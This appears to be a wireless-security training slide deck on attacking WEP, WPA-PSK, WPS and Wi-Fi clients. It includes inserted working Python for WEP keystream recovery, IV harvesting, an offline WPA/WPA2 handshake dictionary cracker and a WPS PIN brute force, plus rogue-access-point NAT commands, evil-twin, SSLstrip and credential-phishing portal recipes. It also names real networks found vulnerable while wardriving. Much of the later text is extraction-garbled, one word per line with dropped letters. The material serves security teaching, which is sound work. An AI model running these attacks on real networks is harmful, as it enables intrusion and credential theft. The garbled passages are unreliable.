4. neXus ADVANCED SECURITY TRAINING
This talk is about
• Overview of the current state of the technology
• Overview of existing attacks against the infrastructure
• Overview of existing attacks against the client
• Overview of the current tools and defences
7. Frame types
• Management frames: allow for the maintenance of communication (finding, joining and leaving a network)
• Control frames: facilitate the exchange of data frames
• Data frames: carry packets with data (files, webpages…)
9. Management frames
• Beacon: AP says: “Yo, I’m here, and I do blahblahblah”
• Probe request/response: STA says: “Hey, are you in range and can you do blah?”. AP says: “I’m in range and do blahblahblah”.
• Authentication request/response: STA says: “I want to identify myself and here’s my key (if any)”. AP says: “ok or not ok”.
• (Re-)Association request/response: STA says: “I want to connect doing blahblahblah and I want to register with you”. AP says: “ok or not ok”.
• De-authentication / Dis-association: “I don’t want to be associated/authenticated anymore”.
11. Wired Equivalent Privacy (WEP)
Its intention was to provide data confidentiality comparable to that of a traditional wired network (source: Wikipedia).
13. How it works
• In (standard) WEP the RC4 seed consists of the 24-bit initialisation vector (IV) prepended to the 40-bit key (the later 104-bit keys work the same way)
• This seed is used to generate a pseudo-random stream of bits (the keystream)
• This stream is then XORed with the plaintext and sent on to the receiver; the IV itself travels in clear in the frame header, since the receiver needs it to rebuild the seed
14. The flaws
• Keys are spread on every system, generally not the best security practice
• Easy to enter secret keys: input is done via 5 ASCII characters, each representing 8 bits -> 40 bits. Issue: printable ASCII characters only cover a small part of the possible byte values (about 95 of 256), a.k.a. we reduce the key space (to roughly 2^33 instead of 2^40)
15. Rule #1 for stream ciphers
Keys (and therefore keystreams) must never be used twice
16. The flaws
• Due to the fact that the IV is only 24 bits long, there is a 50% probability of reusing an IV after about 5000 packets (the birthday bound on 2^24 values; an AP that picks IVs sequentially wraps around after 2^24 frames anyway)
• a.k.a. every few thousand packets we encrypt two frames with the same keystream, and XORing those two ciphertexts cancels the keystream out
• very much crackable
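The three slides above in working code, as an added example that is not part of the original deck: RC4 keyed the way WEP keys it (IV || key), two frames encrypted under the same IV, the keystream cancelling out when the ciphertexts are XORed, and the birthday and printable-ASCII arithmetic behind the "5000 packets" and "reduced key space" claims. The key, IV and frame contents are constructed; the CRC-32 ICV that real WEP appends is left out.

```python
# Added example (not from the neXus slides): RC4 as WEP uses it, and what IV reuse gives
# away. Real WEP builds the RC4 seed as IV || key (the slide's "key + IV") and appends a
# CRC-32 ICV to the plaintext; the ICV is left out here to keep the focus on the keystream.
import math


def rc4_keystream(seed: bytes, length: int) -> bytes:
    """Plain RC4: key-scheduling (KSA), then `length` bytes of PRGA output."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + seed[i % len(seed)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings, truncated to the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: RC4(IV || key) XOR plaintext. The IV itself is sent in the clear."""
    assert len(iv) == 3 and len(key) in (5, 13), "WEP-40 or WEP-104 key, 24-bit IV"
    return xor(rc4_keystream(iv + key, len(plaintext)), plaintext)


def recover_with_reused_iv(c1: bytes, c2: bytes, known_p1: bytes) -> bytes:
    """Two frames under one IV share the keystream, so c1 XOR c2 == p1 XOR p2.
    With one plaintext known (a predictable LLC/ARP header, say) the other drops out;
    the key is never needed."""
    return xor(xor(c1, c2), known_p1)


def iv_collision_probability(packets: int, iv_bits: int = 24) -> float:
    """Birthday bound: probability that at least one IV repeats among `packets` random IVs."""
    space = 2 ** iv_bits
    return 1.0 - math.exp(-packets * (packets - 1) / (2.0 * space))


def ascii_keyspace_bits(key_bytes: int = 5, printable_values: int = 95) -> float:
    """Effective key length in bits when every key byte is a printable ASCII character."""
    return key_bytes * math.log2(printable_values)


if __name__ == "__main__":
    key = b"Sekrt"                      # constructed 40-bit key (5 printable characters)
    iv = bytes.fromhex("0a1b2c")        # constructed IV; a busy AP reuses it within hours
    llc_arp = b"\xaa\xaa\x03\x00\x00\x00\x08\x06"         # LLC/SNAP header of an ARP frame
    p1 = llc_arp + b"\x00\x01\x08\x00\x06\x04\x00\x01"    # ARP request: fully predictable
    p2 = b"\xaa\xaa\x03\x00\x00\x00\x08\x00GET /login?user=bob"   # an IP frame
    c1, c2 = wep_encrypt(key, iv, p1), wep_encrypt(key, iv, p2)
    print(recover_with_reused_iv(c1, c2, p1))   # first len(p1) bytes of p2, no key involved
    print(f"P(IV repeat after 5000 frames) = {iv_collision_probability(5000):.2f}")
    print(f"printable-ASCII 40-bit key is really ~{ascii_keyspace_bits():.1f} bits")
```

The recovery only needs as many known plaintext bytes as you want to read of the other frame; ARP and the LLC/SNAP header of every IP frame supply those for free, which is why IV repeats are enough even before any key-recovery attack is run.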
17. How the industry solved it
Deprecated, as it fails to meet its security goals. Move on to WPA or WPA2.
18. How to break it
• FMS attack (Fluhrer, Mantin and Shamir: statistical recovery of key bytes from “weak” IVs)
• KoreK attack (more IV/keystream correlations on top of FMS)
• ChopChop attack (decrypt a frame byte by byte without the key, abusing the CRC-32 ICV)
• Fragmentation attack (recover keystream from a few known plaintext bytes, then inject arbitrary frames)
• PTW attack (Pyshkin, Tews and Weinmann: needs far fewer IVs; the default in aircrack-ng)
20. How to break it
• Step 1: make sure you are in range of the access point (doh!)
• Step 2: set yourself up with a wireless adapter in monitor mode (listen to everyone chatting)
• Step 3: be patient and wait until you have sufficient IVs (remember the 5000 packets rule)
• Step 4: crack the captured traffic
21. How to break it
• Fortunately there is an alternative for step 3:
  – Associate yourself with the access point (fake authentication): the AP ignores your packets and sends out deauthentication packets in clear text if you are not associated, so injection only works from an associated MAC address
  – Replay ARP packets which you see on the network. ARP packets are great because the access point will re-broadcast every replayed request, each time with a fresh IV, so many IVs are generated in a very short timeframe
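What step 3 actually collects, as an added example that is not from the deck or from aircrack-ng: a parser for protected 802.11 data frames that pulls the IV out of each one, counts IVs per BSSID, reports the repeats that slide 16 promised and flags the original FMS weak-IV class. The frames it runs on are constructed here (the client address and frame contents are made up; the BSSID is the one the deck uses later); in practice they come from a monitor-mode capture with the radiotap header stripped.

```python
# Added example (not from the slides, nor aircrack-ng's code): the IV harvesting behind
# steps 3 and 4, on constructed WEP data frames (what a monitor-mode capture yields once
# the radiotap header is stripped). It counts IVs per BSSID, reports repeats (the
# two-time pad from slide 16) and flags the FMS "weak" IV class (A+3, 0xFF, X).
from collections import Counter, defaultdict

PROTECTED = 0x40             # frame-control flags byte: "Protected Frame" bit
TO_DS, FROM_DS = 0x01, 0x02  # frame-control flags byte: direction bits


def make_wep_data_frame(bssid: bytes, src: bytes, dst: bytes, iv: bytes,
                        enc_body: bytes, key_id: int = 0) -> bytes:
    """Constructed WEP data frame as a client sends it towards the AP (ToDS=1).
    Header = FC(2) Duration(2) Addr1(6) Addr2(6) Addr3(6) Seq(2); then IV(3), KeyID(1),
    ciphertext, ICV(4). The ICV bytes are dummies here."""
    fc = bytes([0x08, PROTECTED | TO_DS])           # type 2 (data), subtype 0
    header = fc + b"\x00\x00" + bssid + src + dst + b"\x00\x00"
    return header + iv + bytes([key_id << 6]) + enc_body + b"\x00" * 4


def parse_wep_frame(frame: bytes):
    """Return (bssid, iv) for a protected data frame, None for anything else."""
    fc0, fc1 = frame[0], frame[1]
    if ((fc0 >> 2) & 0x3) != 2 or not (fc1 & PROTECTED):   # not data, or not protected
        return None
    header_len = 24
    if (fc1 & (TO_DS | FROM_DS)) == (TO_DS | FROM_DS):      # WDS frames carry a 4th address
        header_len += 6
    if fc0 & 0x80:                                          # QoS data subtypes add 2 bytes
        header_len += 2
    addr1, addr2, addr3 = frame[4:10], frame[10:16], frame[16:22]
    direction = fc1 & (TO_DS | FROM_DS)
    bssid = addr1 if direction == TO_DS else addr2 if direction == FROM_DS else addr3
    return bssid, frame[header_len:header_len + 3]


def is_fms_weak_iv(iv: bytes, key_bytes: int = 5) -> bool:
    """Original FMS 'resolved' IVs (A+3, 0xFF, X) leak key byte A of a key_bytes-long key."""
    return iv[1] == 0xFF and 3 <= iv[0] < 3 + key_bytes


def iv_statistics(frames) -> dict:
    """Per BSSID: frame count, unique IVs, IVs seen more than once, FMS weak IVs."""
    seen = defaultdict(Counter)
    for frame in frames:
        parsed = parse_wep_frame(frame)
        if parsed is not None:
            bssid, iv = parsed
            seen[bssid][iv] += 1
    return {
        bssid: {
            "frames": sum(ivs.values()),
            "unique_ivs": len(ivs),
            "repeated": sorted(iv for iv, n in ivs.items() if n > 1),
            "fms_weak": sorted(iv for iv in ivs if is_fms_weak_iv(iv)),
        }
        for bssid, ivs in seen.items()
    }


if __name__ == "__main__":
    ap = bytes.fromhex("7a542e9c311f")           # BSSID from the deauth slide later on
    sta = bytes.fromhex("001122334455")          # constructed client address
    capture = [make_wep_data_frame(ap, sta, b"\xff" * 6, bytes.fromhex(h), b"\x11" * 28)
               for h in ("000001", "000002", "03ff07", "000001")]
    capture.append(b"\x80\x00" + b"\x00" * 30)   # a beacon: ignored, no IV
    for bssid, stats in iv_statistics(capture).items():
        print(bssid.hex(":"), stats)
```

The "unique_ivs" figure is the number aircrack-ng's IVs column reports and the one that decides when step 4 can start; ARP replay from an associated address drives it up because every replayed request makes the AP emit another frame with a fresh IV.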
22. The tools
• Excellent script kiddie material!
  – toolkit which requires some knowledge about the actual attack: aircrack-ng
  – after that many, many more ‘automated’ scripts, e.g. wepcrack, fern, gerix, wifite, …
27. Does this still work?
• 30 minutes walk
• 1k+ wireless networks identified
• +/- 5.5% or 58 wireless networks were (un)protected by WEP
28. Does this still work?
Examples of WEP networks seen during the walk: Bureau, HILLAWI, Eurada_WiFi, LAPOSTE, ITB, ZyXEL, 34_Second_Floor, Le Paddock, EUROCHILD, eurocapital, CS Belgium, Meetingroom, Belkin_G_Plus_MIM..., Thomson84B046
31. The core changes
• integrity checks were added to defeat forgeries (the Michael MIC in TKIP, an AES-based MIC in CCMP)
• protection against replay attacks was added (per-packet sequence counters)
• an improved encryption key solution was introduced (per-session, per-packet keys derived in the 4-way handshake instead of one static key for everyone)
• for WPA2: AES-CCMP was used instead of TKIP (which still runs RC4 underneath)
32. How to break it
• Attacks against the algorithm of WPA (TKIP):
  – Beck and Tews’ attack
  – Ohigashi-Morii attack
  – Michael attacks
  – The Hole196 vulnerability
34. The flaw
• WPA-PSK / WPA2-PSK:
  • Weak(er) pass-phrases may be cracked using dictionary attacks
  • Mainly pass-phrases of 20 characters or less are vulnerable
35. How to break it
Before we begin:
• the passphrase is only used during the initial authentication handshake (the 4-way handshake), so we will need to intercept one of those
• the passphrase used for the pre-shared key must be present in our dictionary or be of a short(er) length
36. How to break it
• Step 1: make sure you are in range of the access point (doh!)
• Step 2: set yourself up with a wireless adapter in monitor mode (listen to everyone chatting)
• Step 3: be patient and wait until you have a client performing authentication
• Step 4: brute force the pre-shared key through the captured authentication handshake
37. How to break it
• Fortunately there is an alternative for step 3:
  – Deauthenticate a wireless client: it reconnects and performs the handshake again
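Step 4 carried through, as an added example that is neither the deck's nor aircrack-ng's code: the PBKDF2 and PRF-512 derivations that turn a candidate passphrase into the key that protects the handshake's MIC, and the dictionary loop that compares MICs. The handshake it cracks is constructed in the block (the addresses, nonces, passphrase and SSID "ABC" are made up), so it runs offline; a real capture supplies the same fields from EAPOL message 2.

```python
# Added example (not the slides' or aircrack-ng's code): the step-4 dictionary attack on a
# captured 4-way handshake. PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations,
# 32 bytes); PTK = PRF-512(PMK, "Pairwise key expansion", min/max(AA, SPA) ||
# min/max(ANonce, SNonce)); its first 16 bytes (KCK) key the EAPOL-Key MIC, which is
# checked against the MIC in message 2 (or 4) of the capture. One MIC per candidate,
# entirely offline. The handshake below is constructed, not a real capture.
import hashlib
import hmac
from typing import Iterable, Optional

EAPOL_MIC_OFFSET = 81   # EAPOL header (4) + descriptor fields up to the Key MIC (77)


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """IEEE 802.11i PRF-512 (SHA-1) as used by WPA/WPA2-PSK; returns 64 bytes."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    blocks = [hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def eapol_mic(kck: bytes, eapol_frame: bytes, key_version: int) -> bytes:
    """MIC over the EAPOL-Key frame with its MIC field zeroed: HMAC-MD5 for key descriptor
    version 1 (WPA/TKIP), HMAC-SHA1 truncated to 16 bytes for version 2 (WPA2/CCMP)."""
    zeroed = (eapol_frame[:EAPOL_MIC_OFFSET] + b"\x00" * 16
              + eapol_frame[EAPOL_MIC_OFFSET + 16:])
    algo = hashlib.md5 if key_version == 1 else hashlib.sha1
    return hmac.new(kck, zeroed, algo).digest()[:16]


def crack_psk(hs: dict, wordlist: Iterable[str]) -> Optional[str]:
    """Return the candidate whose derived KCK reproduces the captured MIC, else None."""
    for word in wordlist:
        pmk = pmk_from_passphrase(word, hs["ssid"])
        kck = ptk_from_pmk(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"], hs["key_version"]), hs["mic"]):
            return word
    return None


def constructed_handshake(passphrase: str, ssid: str = "ABC") -> dict:
    """Build an EAPOL-Key message 2 (WPA2, key descriptor version 2) with a valid MIC,
    standing in for what airodump-ng would capture. All values are made up."""
    ap_mac, sta_mac = bytes.fromhex("7a542e9c311f"), bytes.fromhex("001122334455")
    anonce, snonce = bytes(range(32)), bytes(range(100, 132))
    key_info = b"\x01\x0a"                       # version 2, pairwise, MIC bit set
    body = (b"\x02" + key_info + b"\x00\x10" + b"\x00" * 7 + b"\x01" + snonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16 + b"\x00\x00")
    eapol = b"\x01\x03" + len(body).to_bytes(2, "big") + body
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    mic = eapol_mic(kck, eapol, 2)
    eapol = eapol[:EAPOL_MIC_OFFSET] + mic + eapol[EAPOL_MIC_OFFSET + 16:]
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol": eapol, "mic": mic, "key_version": 2}


if __name__ == "__main__":
    hs = constructed_handshake("Summer2015!")
    print(crack_psk(hs, ["password", "letmein", "Summer2015!", "correct horse"]))
```

The 4096 PBKDF2 iterations are the whole cost of each guess, and the PMK depends on the SSID, so rainbow tables only help for common SSIDs; that, and nothing else, is what puts long random passphrases out of reach.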
38. But wait, wasn’t there something called WPS?
Convenience kills security
40. The flaw
• 8 digit PIN code + 60 seconds time-out after 3 failed attempts = 6.3 years required to crack the PIN
• For some reason the PIN code has been split in 2 sets of 4 digits … Hmmmm
• The router tells you when you found the first 4, great checkpoint. Now we only need 1 day to crack the PIN … (the last digit is a checksum, so it is 10^4 + 10^3 = at most 11,000 guesses instead of 10^8)
41. The flaw
• To make matters worse:
  – the PIN code in many cases is built-in, no way to change it
  – WPS functionality can, in some cases, not be disabled
  – some routers offering the option to disable WPS … … don’t really disable WPS after all
42. How to break it
Brute force!
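The brute force the slide leaves implicit, as an added example that is not from the deck and not reaver's code. The registrar class is a constructed stand-in for an AP; what it models faithfully is the protocol property the two previous slides describe (the two PIN halves are verified separately and the AP signals which one failed, M4 NACK versus M6 NACK in the real exchange) and the WPS checksum on the eighth digit. The PINs are made up, and the time figures reuse the slide's 3-attempts-per-60-seconds lockout: worst case 11,000 guesses at about 20 seconds each is roughly 2.5 days, about half that on average.

```python
# Added example (not from the slides, nor reaver's code): why the WPS PIN search collapses
# from 10^8 to at most 11,000 guesses. The registrar class is a constructed stand-in for
# an AP: the "first half wrong" / "second half wrong" answers (M4 vs M6 NACK in the real
# exchange) and the checksum digit are the real protocol properties; everything else
# (PIN values, lockout figures taken from the slide) is illustration.


def wps_checksum(pin7: int) -> int:
    """The 8th WPS digit is a checksum over the first seven."""
    accum = 0
    while pin7:
        accum += 3 * (pin7 % 10)
        pin7 //= 10
        accum += pin7 % 10
        pin7 //= 10
    return (10 - accum % 10) % 10


class ConstructedRegistrar:
    """Simulated AP that verifies the two PIN halves separately and says which one failed."""

    def __init__(self, pin: str):
        assert len(pin) == 8 and wps_checksum(int(pin[:7])) == int(pin[7]), "invalid WPS PIN"
        self.first, self.second = pin[:4], pin[4:]
        self.attempts = 0

    def try_pin(self, guess: str) -> str:
        self.attempts += 1
        if guess[:4] != self.first:
            return "M4-NACK"      # first half wrong; the second half is never even checked
        if guess[4:] != self.second:
            return "M6-NACK"      # first half confirmed, second half wrong
        return "M7"               # PIN accepted: the AP hands over its WPA credentials


def brute_force(registrar) -> str:
    """Split search: <= 10^4 guesses for the first half, then <= 10^3 for the second,
    because the last digit follows from the checksum."""
    first = next(f"{i:04d}" for i in range(10_000)
                 if registrar.try_pin(f"{i:04d}0000") != "M4-NACK")
    for j in range(1_000):
        pin7 = int(first + f"{j:03d}")
        pin = f"{pin7:07d}{wps_checksum(pin7)}"
        if registrar.try_pin(pin) == "M7":
            return pin
    raise RuntimeError("no PIN found: the split-verification assumption does not hold")


def worst_case_seconds(attempts: int, lockout_seconds: int = 60, attempts_per_lockout: int = 3) -> float:
    """Time at the slide's rate limit (60 s lockout after 3 failures): about 20 s per guess."""
    return attempts * lockout_seconds / attempts_per_lockout


if __name__ == "__main__":
    reg = ConstructedRegistrar("12345670")        # 0 is the checksum of 1234567
    print(brute_force(reg), "after", reg.attempts, "attempts")
    print("worst case, all 11,000 guesses:", worst_case_seconds(11_000) / 86_400, "days")
    print("full 7-digit search (checksum known):", worst_case_seconds(10_000_000) / 31_557_600, "years")
```

Note that the lockout in the slide is the only thing standing between the attacker and a few hours: reaver and similar tools simply pace their guesses to stay under it.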
46. Does this still work?
• Same round
• 1055 wireless networks identified
• +/- 18% or 178 wireless networks were using WPS
47. Does
this
still
work?
Cisco
Ducale
51
ActuaTV-‐VP
Meetingroom
STELLA
Consulting
EUROHUB
CONSULTANCY
Regency
Misija
NATO
Voyager
King's
Room
FurEurope
francite
Kabinet
michel
Act
As
One
Exco
II
Economic
neXusADVANCED SECURITY TRAINING
49. How
it
works
•
Replace
the
pre-‐shared-‐key
with
more
corporate
grade
authentication
system
covering:
–
authentication
–
key
distribution
•
Extensible
Authentication
Protocol
a.k.a.
authentication
framework
neXusADVANCED SECURITY TRAINING
50. LEAP
•Lightweight
EAP
–
Credentials
are
sent
using
MS-‐CHAP
without
SSL
tunnel
protection
–
User
credentials
are
not
strongly
protected
–
Offline
password
cracking
possible
neXusADVANCED SECURITY TRAINING
51. PEAP
•Protected
EAP
–
EAP
is
encapsulated
in
a
TLS
tunnel
(encryption
&
authentication)
–
Credentials
are
sent
using
MS-‐CHAPv2
neXusADVANCED SECURITY TRAINING
52. EAP
•
Many
variants
available
(hence
extensible):
–
EAP-‐TLS:
based
on
certificates
and
public/private
keys
–
EAP-‐MD5:
based
on
MD5
hashing
to
pass
credentials
–
EAP-‐IKEv2:
based
on
Key
Exchange
Protocol
version
2
neXusADVANCED SECURITY TRAINING
53. Flaws
&
attacks
•
EAP
overall:
–
communication
between
Access
Points
and
RADIUS
server(s)
relies
only
on
the
HMAC-‐MD5
hashing
algorithm
in
RADIUS
implementations
=
vulnerable
to
man-‐in-‐the-‐middle
attacks
–
users
/
endpoints
are
left
with
the
decision
whether
or
not
to
trust
the
certificates
provided
by
the
authenticator
=
vulnerable
to
impersonation
attack
neXusADVANCED SECURITY TRAINING
58. Last
but
not
least
The
wireless
access
point
or
router
interfaces
neXusADVANCED SECURITY TRAINING
59. neXusADVANCED SECURITY TRAINING
AP’s
are
no
other
then
the
rest
•Default
configuration
/
passwords
…
far
too
common
•Webservers
embedded
in
small
devices
…
•Attacks
which
tend
to
work
on
regular
websites
also
work
against
admin
pages:
•Cross
Site
Request
Forgery
•DNS
rebinding
60. Further
reading
•
http://www.iescobar.net/survey%20wifi.pdf
•
https://www.matthieu.io/dl/wifi-‐attacks-‐wep-‐wpa.pdf
•https://en.wikipedia.org/wiki/Fluhrer,_Mantin_and_Shamir_attack
•
http://dl.aircrack-‐ng.org/breakingwepandwpa.pdf
•
http://www.aircrack-‐ng.org/doku.php?id=simple_wep_crack
•
http://www.aircrack-‐ng.org/doku.php?id=cracking_wpa&s[]=wpa&s[]=crack
neXusADVANCED SECURITY TRAINING
62. Major Categories
• Attacking the client directly: wireless card driver
attacks
• Attacking the client via “Man in the Middle”
attacks (MitM)
neXusADVANCED SECURITY TRAINING
63. Wireless Driver Attacks
• Mostly Buffer Overflow type flaws
• Not trivial: requires deep knowledge on OS/Kernel
level
• Vendor specific
• Not much has happened lately
neXusADVANCED SECURITY TRAINING
64. Last public driver BO Exploit dates from 2010
neXusADVANCED SECURITY TRAINING
65. “Man in the Middle” Attacks
• Victim connects to “evil” AP -> Attacker has
control over traffic
• Very popular
• = Starting Point of 50 shades of exploitation:
sniffing, injection, dns poisoning,…
neXusADVANCED SECURITY TRAINING
66. Popular Attacks
• Free Wifi : because people like free stuff
• Karma/Jasager: because 802.11 is (was?) flawed
• Mana: because Karma is flawed
• Mana-toolkit: attacking secure networks
• Fake Portal: because social engineering is
effective
neXusADVANCED SECURITY TRAINING
67. Free Wifi
• How it works: just set up an open AP in a crowded
area and people will connect
• Tools needed: Laptop+ Kali Linux : Hostapd/
Airbase-ng + iptables + forwarding + dnsmasq
• or get a Pineapple MarkV if you have 99 USD
lying around
neXusADVANCED SECURITY TRAINING
68. Freewifi config: Routing and NAT:
ifconfig wlan1 up
ifconfig wlan1 172.16.50.1/24
iptables --policy INPUT ACCEPT
iptables --policy OUTPUT ACCEPT
iptables --policy FORWARD ACCEPT
iptables -t nat -F
iptables -F
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT
echo '1' > /proc/sys/net/ipv4/ip_forward
+ run hostapd and dnsmasq (configs next slides)
neXusADVANCED SECURITY TRAINING
72. But
I
don’t
trust
“FreeWifi”1…
Enter
the
“PNL”
•a.k.a.
The
Preferred
Network
List
•Every
Eme
we
connect
to
an
AP,
it
get’s
stored
on
our
devices
in
the
PNL
•Our
devices
“probe”
all
the
Eme
for
these
networks
•When
probing
for
a
specific
network,
the
device
sends
a
request
probe
with
a
specific
SSID
(directed
probe)
•Devices
also
send
out
null
probes:
request
probes
with
SSID=“”
neXusADVANCED SECURITY TRAINING
73. But
I
don’t
trust
“FreeWifi”2…..
Enter
“Karma”
•Karma
aWack:
an
AP
that
responds
posiEve
to
all
directed
probes
(a.k.a.
“Jasager”)
Is “Macdonalds” Wifi here?
Sure, that’s me
Is “corporate-guest” here?
Sure, that’s me
neXusADVANCED SECURITY TRAINING
74. What
happened
(unEl+-‐2012)
•Clients
constantly
sent
directed
probes
for
all
networks
in
their
PNL
(Preferred
Network
List)
•An
evil
Karma
AP
responded
posiEvely
to
any
directed
probe
•Clients
automaEcally
(!!)
connected
to
the
Karma
AP
neXusADVANCED SECURITY TRAINING
75. So,
what
happened
around
+-‐2012?
•Vendors
silently
‘fixed’
behaviour
in
newer
OS’:
Clients
only
connected
when
AP
responded
to
BOTH
directed/null
probe
•Devices
stopped
constantly
sending
directed
probes.
Some
stopped
sending
them
altogether
(IOS).
•Karma
didn’t
respond
to
broadcast
null
probes
Karma
was
broken
neXusADVANCED SECURITY TRAINING
76. Hackers
‘fix’
Karma
aWack…
Enter
“Mana”
•Mana
=
modified
Hostapd
for
Karma
aWack
•Actually:
Mana-‐toolkit
(modded
hostapd
+
bunch
of
stuff)
•Mana
waits
unEl
it
sees
a
directed
probe
and
then
responds
to
both
directed
and
broadcast
probe.
•Behaviour
of
probing
sEll
differs
greatly
between
OS’s
•Also
has
‘loud
mode’:
it
keeps
a
list
of
all
SSID’s
it
sees
from
all
devices
and
broadcasts
them:
more
chance
to
get
‘popular’
SSID’s
neXusADVANCED SECURITY TRAINING
77. DetecEng
probes
•Wireshark
filter
for
request
probes:
wlan.fc.type_subtype
==
0x04
•or
Python+
scapy
•don’t
forget
to
put
interface
in
monitor
mode
neXusADVANCED SECURITY TRAINING
78. Example:
Nexus
5
Phone
with
Android
OS
4.4.3
•ErraEc:
direct
probes
with
30
seconds
to
10
minute
intervals.
neXusADVANCED SECURITY TRAINING
79. So
what
about
hidden
SSID’s
?
•Hidden
networks
don’t
return
a
SSID
in
response
to
a
broadcast
probe:
the
AP
only
gives
the
SSID
when
receiving
a
directed
probe.
•Devices
with
a
hidden
network
in
their
PNL
need
to
probe
for
it
specifically
•IOS
devices
only
do
this
when
it
sees
at
least
1
hidden
network
•SoluEon:
put
a
hidden
network
somewhere
to
get
directed
probes
from
IOS
devices
for
hidden
networks
neXusADVANCED SECURITY TRAINING
81. Can
we
get
more
“vicEms”?
Enter
“De-‐Auth”
•De-‐authenEcaEon
packet
is
sent
to
terminate
communicaEon
between
a
client
and
an
AP
•Is
done
via
a
management
packet:
cleartext
•Can
be
spoofed
easily
Anyone
can
de-‐authenEcate
anyone
We
can
disconnect
exisEng
connecEons
(unEl
they
connect
to
us)
neXusADVANCED SECURITY TRAINING
82. DeauthenEcaEon
tools
•Aireplay-‐ng:
e.g.
deauth
all
clients
of
BSSID
7a:54:2e:9c:31:1f
•mdk3
(“Murder
Death
Kill”)
•Several
scripts
neXusADVANCED SECURITY TRAINING
84. What
about
secure
networks?
(SSL)
•A
lot
of
apps
use
SSL
connecEons
•login
pages
/
sensiEve
data:
websites
use
SSL
•an
aWacker
performing
MitM
can
not
read
data
directly
•A
lot
of
aWacks
against
SSL
lately
(BEAST,
POODLE,
…),
but
most
aWacks
impracEcal
(except
heartbleed,
which
isn’t
a
MitM
aWack)
neXusADVANCED SECURITY TRAINING
85. Common
aWack
methods
1:
Fake
CERT
•Terminate
SSL
connecEon
in
the
Middle
and
present
your
own
cerEficate.
•Problem:
SSL
popup
•SoluEon:
None.
•But
users
usually
click
through
annoying
popups
:)
No Problem :)
neXusADVANCED SECURITY TRAINING
86. Common
aWack
methods
2:
SSLSTRIP
•SSLStrip
is
a
proxy
in
the
Middle
that
changes
all
HTTPS
links
in
hWp
responses
to
HTTP
(it
“strips”
the
SSL)
•Problem:
»
A)
works
only
for
redirects
to
hWps
»
B)
address
in
browser
shows
as
hWp
instead
of
hWps
•SoluEon:
»A)
None
»B)
we
add
a
favicon
that
looks
like
a
lock:
good
enough
for
most
users
neXusADVANCED SECURITY TRAINING
88. Vendors
Response:
HSTS
•HSTS
=
HTTP
Strict
Transport
Security
•Sites
can
send
a
‘Strict-‐Transport-‐Security’
response
header
back
to
the
browser
•Once
the
browser
has
received
this,
the
browser
will
only
connect
directly
in
HTTPS
•Google
also
maintains
a
preloaded
list
•Used
by
latest
versions
of
Chrome,
Safari,
Firefox
(not
IE<12)
neXusADVANCED SECURITY TRAINING
89. Hackers
Respond:
SSLSplit
•SOLUTION:
“sslsplit”
=
modified
sslstrip
–“Works
like
a
proxy,
similar
to
sslstrip.”
–“
SSLsplit
removes
response
headers
for
HPKP
in
order
to
prevent
public
key
pinning
for
HSTS,
to
allow
the
user
to
accept
untrusted
cerEficates”
–
generates
on
the
fly
fake
cerEficates
•But
if
the
user
already
browsed
to
the
site
before,
the
browser
will
sEll
use
HTTPS
only
Problem
not
yet
solved
neXusADVANCED SECURITY TRAINING
90. Hackers
respond
some
more:
SSLStrip+
•SSLStrip+
changes
hostname:
–
User
wants
to
surf
to
www.google.com
and
gets
redirected
to
wwww.google.com
.
SSLStrip+
keeps
track
of
DNS.
–
users
wants
to
surf
to
account.google.com
and
gets
redirected
to
accounts.google.com
•Because
accounts.google.com
and
wwww.google.com
do
not
exist,
the
browser
also
doesn’t
have
an
HSTS
entry
for
them,
and
sslsplit
works.
•Latest
aWack
against
HSTS:
NTP
MitM
neXusADVANCED SECURITY TRAINING
93. Demo:
Evil
Twin
Scenario
•We
listen
for
wireless
traffic
around
us
and
see
open
AP
“ABC”
•We
setup
an
access
point
with
Mana
Toolkit
and
name
it
“ABC”
•We
de-‐authorise
“USER1”
who
is
connected
to
“ABC”
•“USER1”
connects
to
our
AP
•We
sniff
traffic,
using
SSLStrip+
and
capture
the
google
password
neXusADVANCED SECURITY TRAINING
96. Demo:
Evil
Portal
•We
Set
Up
a
Wireless
Portal
that
Provides
free
access
(preferably
somewhere
where
there’s
a
lot
of
people
and
no
other
AP’s)
•Some
social
engineering:
people
can
login
with
Google,
facebook,
twiWer
and
other
social
media
accounts
•…
but
not
really
neXusADVANCED SECURITY TRAINING
98. Conclusions
•Karma
aWack
sEll
works
on
some
devices
but
not
that
great
(not
many
direct
probes)
•There
are
sEll
tricks
to
‘bypass’
secure
networks,
but
vendors
are
working
on
it
as
well
(HSTS)
•Most
effecEve
aWacks
these
days
involve
some
degree
of
social
engineering:
Evil
Twin
+
Deauth,
Fake
CapEve
Portal
neXusADVANCED SECURITY TRAINING
100. neXusADVANCED SECURITY TRAINING
Want
to
see
more?
•
www.nexus-‐training.eu
•
video’s
available
•
slideset
will
be
provided
there
too
•
training
•
30.03-‐01.04
3
day
hacking
introducEon
@
Ausy
(Haasrode)
